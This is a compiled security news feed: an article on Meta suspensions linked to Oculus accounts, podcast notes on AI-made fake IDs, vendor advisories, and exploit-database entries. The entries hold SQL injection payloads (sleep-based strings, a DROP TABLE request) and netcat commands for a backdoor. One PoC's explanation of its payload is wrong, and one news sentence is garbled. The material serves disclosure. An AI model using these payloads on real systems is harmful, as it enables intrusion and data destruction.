By Deeba Ahmed
META is suspending accounts of users on Facebook and Instagram, potentially linked to malicious Vietnamese activity involving META's Oculus.
This is a post from HackRead.com Read the original post: Linked Oculus Accounts Trigger Facebook and Instagram Suspension

Experiencing a sudden Facebook or Instagram account suspension? You’re not alone. Suspicious activity on Oculus accounts linked to META users is going unaddressed as META opts for suspensions instead of addressing the root cause.

Multiple posts on social media platforms like Reddit suggest a sudden rise in Facebook and Instagram account suspensions, causing frustration among users, mainly because they are clueless about why this is happening.

Many users claim their accounts were suspended without warning or explanation, leaving them unaware of the alleged violation. Users complained about seeing a suspension message from Meta that read:

“Your account was suspended because your linked Meta account doesn’t follow our rules. Log into your linked auth.oculus.com account to appeal our decision.”

Users are confused and frustrated due to Meta’s lack of transparency about suspension reasons and limited appeal options whereas the lack of communication from Meta regarding the suspensions is making it difficult to understand and address the situation.

Reddit user r/facebookdisabledme posted: “Facebook suspended my account without giving any specific reason. Trying to appeal is proving to be extremely difficult.”

Users on Facebook, Instagram, and Reddit are reporting a connection between suspensions and their linked Oculus accounts, indicating a potential security issue within the VR platform. Further probing reveals that Vietnamese hackers could be exploiting vulnerabilities in the Oculus Meta system, which was acquired by Meta in 2014.

“There were 2 logins from Vietnam into my account (I’m from Belgium). Most likely that’s why Facebook suspended the account immediately? But I didn’t get any recovery mail or explanation” user u/Mammoth\_Resolution\_7 shared on Reddit.

One user claimed the hacker linked Meta Horizon account to his Facebook and another reported linking of Meta Oculus. 

According to sources, hackers are creating Oculus Meta accounts and linking them to victims’ social media accounts, registering them as unauthorized access, which is leading to thousands of account suspensions.

For your information, Meta introduced Meta Accounts in 2022 to allow the decoupling of Quest users’ devices from their Facebook profiles. This change was deemed inevitable as it prevented users from losing access to their Oculus Meta account if their Facebook account was banned. However, multiple accounts are still linked, affecting many Facebook or Instagram accounts’ safety.

It is also worth noting that Vietnamese cybercriminals have a history of targeting META and business pages on the platform, with instances of **using DarkGate malware** to steal login credentials.

Nevertheless, META almost member addresses why it suspends user accounts. However, to avoid account suspensions, users should review Meta’s Community Standards, check for official announcements on their website or social media platforms, contact Meta Support through their official channels, and be patient and persistent in navigating the appeal process.

Meta should provide clear communication and address concerns promptly and transparently, as it is crucial for users to understand the specific reason for their account suspension and to be patient and persistent in their efforts to reach out to them.

1.  **Vietnamese Group Hacks and Sells Bedroom Camera Footage**
2.  **Vietnamese man hacked Aussie airport systems; stole security data**
3.  **Fake ChatGPT and AI pages on Facebook are spreading infostealers**
4.  **New Phishing Scam Hooks META Businesses with Trademark Threats**
5.  **Provocative Facebook Ads Leveraged to Deliver NodeStealer Malware**

Linked Oculus Accounts Trigger Facebook and Instagram Suspension

This week on the Lock and Code podcast, we speak with Joseph Cox about how an OnlyFake-generated fake ID fooled a cryptocurrency exchange.

_This week on the Lock and Code podcast…_

For decades, fake IDs had roughly three purposes: Buying booze before legally allowed, getting into age-restricted clubs, and, we can only assume, completing nation-state spycraft for embedded informants and double agents.

In 2024, that’s changed, as the uses for fake IDs have become enmeshed with the internet.

Want to sign up for a cryptocurrency exchange where you’ll use traditional funds to purchase and exchange digital currency? You’ll likely need to submit a _photo_ of your real ID so that the cryptocurrency platform can ensure you’re a real user. What about if you want to watch porn online in the US state of Louisiana? It’s a niche example, but because of a law passed in 2022, you will likely need to submit, again, a _photo_ of your state driver’s license to a separate ID verification mobile app that then connects with porn sites to authorize your request.

The discrepancies in these end-uses are stark; cryptocurrency and porn don’t have too much in common with Red Bull vodkas and, to pick just one example, a Guatemalan coup. But there’s something else happening here that reveals the subtle differences between yesteryear’s fake IDs and today’s, which is that modern ID verification doesn’t need a physical ID card or passport to work—it can sometimes function only with an _image_.

Last month, the technology reporting outfit 404 Media investigated an online service called OnlyFake that claimed to use artificial intelligence to pump out _images_ of fake IDs. By filling out some bogus personal information, like a made-up birthdate, height, and weight, OnlyFake would provide convincing images of real forms of ID, be they driver’s licenses in California or passports from the US, the UK, Mexico, Canada, Japan, and more. Those images, in turn, could then be used to fraudulently pass identification checks on certain websites.

When 404 Media co-founder and reporter Joseph Cox learned about OnlyFake, he tested whether an image of a fake passport he generated could be used to authenticate his identity with an online cryptocurrency exchange.

In short, it did.

By creating a fraudulent British passport through OnlyFake, Joseph Cox—or as his fake ID said, “David Creeks”—managed to verify his false identity when creating an account with the cryptocurrency market OKX.

Today, on the Lock and Code podcast with host David Ruiz, we speak with Cox about the believability of his fake IDs, the AI claims and limitations of OnlyFake, what’s in store for the future of the site— which went dark after Cox’s report—and what other types of fraud are now dangerously within reach for countless threat actors.

> Making fake IDs, even photos of fake IDs, is a very particular skill set—it’s like a trade in the criminal underground. You don’t need that anymore.
> 
> Joseph Cox, 404 Media co-founder

Tune in today to listen to the full conversation.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

**Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.**

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium for Lock and Code listeners.

 How to make a fake ID online, with Joseph Cox: Lock and Code S05E05 

### TL;DR

This vulnerability affects all Kirby sites that might have potential attackers in the group of authenticated Panel users.

The attack requires user interaction by another user or visitor and *cannot* be automated.

----

### Introduction

Unrestricted upload of files with a dangerous type is a type of vulnerability that allows to circumvent expectations and protections in the server setup or backend code. Uploaded files are not checked for their compliance with the intended purpose of the upload target, which can introduce secondary attack vectors.

While the vulnerability described here does *not* allow critical attacks like remote code execution (RCE), it can still be abused to upload unexpected file types that could for example make it possible to perform cross-site scripting (XSS) attacks.

### Impact

Users with Panel access can upload a user avatar in their own account view. This avatar is intended to be an image, however the file type or file extension was not validated on the backend. This effectively allowed to upload many types of files that would then be stored with the filename `profile` and the provided file extension.

While the upload is protected against dangerous file types such as HTML files or executable PHP files, this could be abused to upload unexpected files such as PDFs that would then be available via a direct link. These links could be shared to other users.

### Patches

The problem has been patched in [Kirby 3.6.6.5](https://github.com/getkirby/kirby/releases/tag/3.6.6.5), [Kirby 3.7.5.4](https://github.com/getkirby/kirby/releases/tag/3.7.5.4), [Kirby 3.8.4.3](https://github.com/getkirby/kirby/releases/tag/3.8.4.3), [Kirby 3.9.8.1](https://github.com/getkirby/kirby/releases/tag/3.9.8.1), [Kirby 3.10.0.1](https://github.com/getkirby/kirby/releases/tag/3.10.0.1), and [Kirby 4.1.1](https://github.com/getkirby/kirby/releases/tag/4.1.1). Please update to one of these or a [later version](https://github.com/getkirby/kirby/releases) to fix the vulnerability.

In all of the mentioned releases, we have added validations that prevent any files that don't have an image file extension or MIME type from being uploaded as a user avatar.

### Credits

Thanks to Natwara Archeepsamooth (@PlyNatwara) for responsibly reporting the identified issue.

**TL;DR**

This vulnerability affects all Kirby sites that might have potential attackers in the group of authenticated Panel users.

The attack requires user interaction by another user or visitor and _cannot_ be automated.

**Introduction**

Unrestricted upload of files with a dangerous type is a type of vulnerability that allows to circumvent expectations and protections in the server setup or backend code. Uploaded files are not checked for their compliance with the intended purpose of the upload target, which can introduce secondary attack vectors.

While the vulnerability described here does _not_ allow critical attacks like remote code execution (RCE), it can still be abused to upload unexpected file types that could for example make it possible to perform cross-site scripting (XSS) attacks.

**Impact**

Users with Panel access can upload a user avatar in their own account view. This avatar is intended to be an image, however the file type or file extension was not validated on the backend. This effectively allowed to upload many types of files that would then be stored with the filename profile and the provided file extension.

While the upload is protected against dangerous file types such as HTML files or executable PHP files, this could be abused to upload unexpected files such as PDFs that would then be available via a direct link. These links could be shared to other users.

**Patches**

The problem has been patched in Kirby 3.6.6.5, Kirby 3.7.5.4, Kirby 3.8.4.3, Kirby 3.9.8.1, Kirby 3.10.0.1, and Kirby 4.1.1. Please update to one of these or a later version to fix the vulnerability.

In all of the mentioned releases, we have added validations that prevent any files that don't have an image file extension or MIME type from being uploaded as a user avatar.

**Credits**

Thanks to Natwara Archeepsamooth (@PlyNatwara) for responsibly reporting the identified issue.

**References**

*   GHSA-xrvh-rvc4-5m43
*   https://nvd.nist.gov/vuln/detail/CVE-2024-26483
*   https://shrouded-trowel-50c.notion.site/Kirby-CMS-4-1-0-Unrestricted-File-Upload-dc60ce3132f04442b73f2dba2631fae0?pvs=4

GHSA-xrvh-rvc4-5m43: Kirby vulnerable to unrestricted file upload of user avatar images

Gentoo Linux Security Advisory 202402-32 - A vulnerability has been discovered in btrbk which can lead to remote code execution. Versions greater than or equal to 0.31.2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-32  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: btrbk: Remote Code Execution  
     Date: February 26, 2024  
     Bugs: #806962  
       ID: 202402-32

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in btrbk which can lead to remote  
code execution.

Background  
==========

btrbk is a backup tool for btrfs subvolumes, taking advantage of btrfs  
specific capabilities to create atomic snapshots and transfer them  
incrementally to your backup locations.

Affected packages  
=================

Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
app-backup/btrbk  < 0.31.2      >= 0.31.2

Description  
===========

A vulnerability has been discovered in btrbk. Please review the CVE  
identifier referenced below for details.

Impact  
======

Specialy crafted commands may be executed without being propely checked.  
Applies to remote hosts filtering ssh commands using ssh_filter_btrbk.sh  
in authorized_keys.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All btrbk users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-backup/btrbk-0.31.2"

References  
==========

[ 1 ] CVE-2021-38173  
      https://nvd.nist.gov/vuln/detail/CVE-2021-38173

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-32

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-32

Debian Linux Security Advisory 5631-1 - It was discovered that iwd, the iNet Wireless Daemon, does not properly handle messages in the 4-way handshake used when connecting to a protected WiFi network for the first time. An attacker can take advantage of this flaw to gain unauthorized access to a protected WiFi network if iwd is operating in Access Point (AP) mode.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5631-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoFebruary 25, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : iwdCVE ID         : CVE-2023-52161Debian Bug     : 1064062It was discovered that iwd, the iNet Wireless Daemon, does not properlyhandle messages in the 4-way handshake used when connecting to aprotected WiFi network for the first time. An attacker can takeadvantage of this flaw to gain unauthorized access to a protected WiFinetwork if iwd is operating in Access Point (AP) mode.For the oldstable distribution (bullseye), this problem has been fixedin version 1.14-3+deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 2.3-1+deb12u1.We recommend that you upgrade your iwd packages.For the detailed security status of iwd please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/iwdFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmXbGdBfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0TLGg/9HYY8mbmW8ZU9Kf6v7Bns1D7hNx+6C76koK3nliJ1nTwya7rBBCkBo2TB1/x0h94k2s4AV5KSrJmP2RsqeGrnF/cTp8cKvdNYTU8QJYZA7q1B29MNQDhxqUYCO+HsSgm/HZdsNtajnqZi8KpP4wCbx9w5c1DZ2jmHt5z/vfZAn/Y5FOsPW0fZxe6UGNyoZ0/YwuY9bdH4dvhhsJOZg3B3FtD/DD7IsN0ltY2rFjJmmsQusCrmyDQsNYDYcH3iobOmHQPQ/QnjtrUQsyZb0M6/49EW38H1F76oc57o8jf4MTMsa68TeSFnBC5OOZ5MToB5yKiBAT0+J8wClBGI4iLYCkg6VERLT6pc7d+ffX+EshcTV9eAJgUUoeRGuCNld9M01gRN+i51Gib5YidfMhGQmRb9CMpiF3Ll5rErl/YmQ91GV5W5rBngEpkdQNedIYpPD/tqf2QxTcAzFyT+C+NgcB/LOI3O8p2rjYFEHl773DJEeHvfbwaTKgdKrlZUouO2lqadNQXugrLsGDNqhHOuVgxxzBONjZMyDKjfEOlcqjnySWeZ4CArxAriBVWJ5BbHf50ZLBpo7agcB//u0IH8z31OZwbkNXJfE58gVV0JRuqsfDbn0sIG6CB4r4I5CNICiubHZDJNwkGOVhdmSFcd5nelmPa45inO2DgxEBAKVdU==Pykz-----END PGP SIGNATURE-----

Debian Security Advisory 5631-1

Simple Inventory Management System version 1.0 suffers from a remote SQL injection vulnerability.

# Exploit Title: Simple Inventory Management System - SQL Injection  
# Google Dork: N/A  
# Application: Simple Inventory Management System  
# Date: 26.02.2024  
# Bugs: SQL Injection   
# Exploit Author: SoSPiro  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/15419/simple-inventory-management-system-phpoop-free-source-code.html  
# Version: 1.0  
# Tested on: Windows 10 64 bit Wampserver   
# CVE : N/A

## Vulnerability Description:

This code snippet is potentially vulnerable to SQL Injection. User inputs ($_POST['email'] and $_POST['pwd']) are directly incorporated into the SQL query without proper validation or sanitization, exposing the application to the risk of manipulation by malicious users. This could allow attackers to inject SQL code through specially crafted input.

## Proof of Concept (PoC):

An example attacker could input the following values:

email: test@gmail.com'%2b(select*from(select(sleep(20)))a)%2b'  
pwd: test

This would result in the following SQL query:

SELECT * FROM users WHERE email = 'test@gmail.com'+(select*from(select(sleep(20)))a)+'' AND password = 'anything'

This attack would retrieve all users, making the login process always successful.

request-response foto:https://i.imgur.com/slkzYJt.png

## Vulnerable code section:  
====================================================  
ims/login.php

<?php   
ob_start();  
session_start();  
include('inc/header.php');  
$loginError = '';  
if (!empty($_POST['email']) && !empty($_POST['pwd'])) {  
  include 'Inventory.php';  
  $inventory = new Inventory();

  // Vulnerable code  
  $login = $inventory->login($_POST['email'], $_POST['pwd']);   
  //

if(!empty($login)) {  
    $_SESSION['userid'] = $login[0]['userid'];  
    $_SESSION['name'] = $login[0]['name'];        
    header("Location:index.php");  
  } else {  
    $loginError = "Invalid email or password!";  
  }  
}  
?>

Simple Inventory Management System 1.0 SQL Injection

Flashcard Quiz App version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Flashcard Quiz App - SQL Injection# Google Dork: N/A# Application: Flashcard Quiz App# Date: 25.02.2024# Bugs: SQL Injection # Exploit Author: SoSPiro# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/17160/flashcard-quiz-app-using-php-and-mysql-source-code.html# Version: 1.0# Tested on: Windows 10 64 bit Wampserver # CVE : N/A## Vulnerability Description:The provided PHP code is vulnerable to SQL injection. SQL injection occurs when user inputs are directly concatenated into SQL queries without proper sanitization, allowing an attacker to manipulate the SQL query and potentially perform unauthorized actions on the database.## Proof of Concept (PoC):This vulnerability involves injecting malicious SQL code into the 'card' parameter in the URL.1. Original Code:$card = $_GET['card'];$query = "DELETE FROM tbl_card WHERE tbl_card_id = '$card'";2. Payload:' OR '1'='1'; SELECT IF(VERSION() LIKE '8.0.31%', SLEEP(5), 0); --3. Injected Query:DELETE FROM tbl_card WHERE tbl_card_id = '' OR '1'='1'; SELECT IF(VERSION() LIKE '8.0.31%', SLEEP(5), 0); --Request Response foto: https://i.imgur.com/5IXvpiZ.png## Vulnerable code section:====================================================endpoint/delete-flashcard.php$card = $_GET['card'];$query = "DELETE FROM tbl_card WHERE tbl_card_id = '$card'";

Flashcard Quiz App 1.0 SQL Injection

FAQ Management System version 1.0 suffers from a remote SQL injection vulnerability.

# Exploit Title: FAQ Management System - SQL Injection  
# Google Dork: N/A  
# Application: FAQ Management System  
# Date: 25.02.2024  
# Bugs: SQL Injection   
# Exploit Author: SoSPiro  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/17175/faq-management-system-using-php-and-mysql-source-code.html  
# Version: 1.0  
# Tested on: Windows 10 64 bit Wampserver   
# CVE : N/A

## Vulnerability Description:

The provided code is vulnerable to SQL injection. The vulnerability arises from directly using user input ($_GET['faq']) in the SQL query without proper validation or sanitization. An attacker can manipulate the 'faq' parameter to inject malicious SQL code, leading to unintended and potentially harmful database operations.

## Proof of Concept (PoC):

An attacker can manipulate the 'faq' parameter to perform SQL injection. For example:

1. Original Request:  
http://example.com/endpoint/delete-faq.php?faq=123

2.Malicious Request (SQL Injection):  
http://example.com/endpoint/delete-faq.php?faq=123'; DROP TABLE tbl_faq; --

This would result in a query like:

DELETE FROM tbl_faq WHERE tbl_faq_id = '123'; DROP TABLE tbl_faq; --

Which can lead to the deletion of data or even the entire table.

poc foto: https://i.imgur.com/1IENYFg.png

## Vulnerable code section:  
====================================================  
endpoint/delete-faq.php

$faq = $_GET['faq'];

// ...

$query = "DELETE FROM tbl_faq WHERE tbl_faq_id = '$faq'";

FAQ Management System 1.0 SQL Injection

Backdoor.Win32.AutoSpy.10 malware suffers from a remote command execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/b012704cad2bae6edbd23135394b9127.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.AutoSpy.10Vulnerability: Unauthenticated Remote Command ExecutionDescription: The malware listens on TCP port 1008. Third party adversaries who can reach an infected host can issue various commands made available by the backdoor. Command "startapp" will run programs, "msgbox" will send a popup box to message the victim. The "hangup victim" cmd will cause infinite notepad.exe processes to open on the affected machine. Other commands avail are "info tick" which returns system information, "kill" [file] etc.Family: AutoSpyType: PE32MD5: b012704cad2bae6edbd23135394b9127Vuln ID: MVID-2024-0671Disclosure: 02/24/2024Exploit/PoC:C:\sec>nc64.exe x.x.x.x 1008startapp "c:\Windows\System32\mspaint.exe"Application started...startapp "c:\Windows\System32\calc.exe"Application started...msgbox hateMessagebox shown...info tickProduct Name       :Product ID         :Product Type       :User Organization  :User Name          :System Root        :Version            :Version Number     :Sub Version Number :Computer Name      : DESKTOP-2C4IJHOTime Zone          : @tzres.dll,-112Network Logon      :beep BeepBeep send...hangup victimDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.AutoSpy.10 MVID-2024-0671 Remote Command Execution

Red Hat Security Advisory 2024-0967-03 - An update for opensc is now available for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0967.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: opensc security updateAdvisory ID:        RHSA-2024:0967-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0967Issue date:         2024-02-26Revision:           03CVE Names:          CVE-2023-5992====================================================================Summary: An update for opensc is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The OpenSC set of libraries and utilities provides support for working with smart cards. OpenSC focuses on cards that support cryptographic operations and enables their use for authentication, mail encryption, or digital signatures.Security Fix(es):* OpenSC: Side-channel leaks while stripping encryption PKCS#1 padding (CVE-2023-5992)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-5992References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2248685

Tag

#auth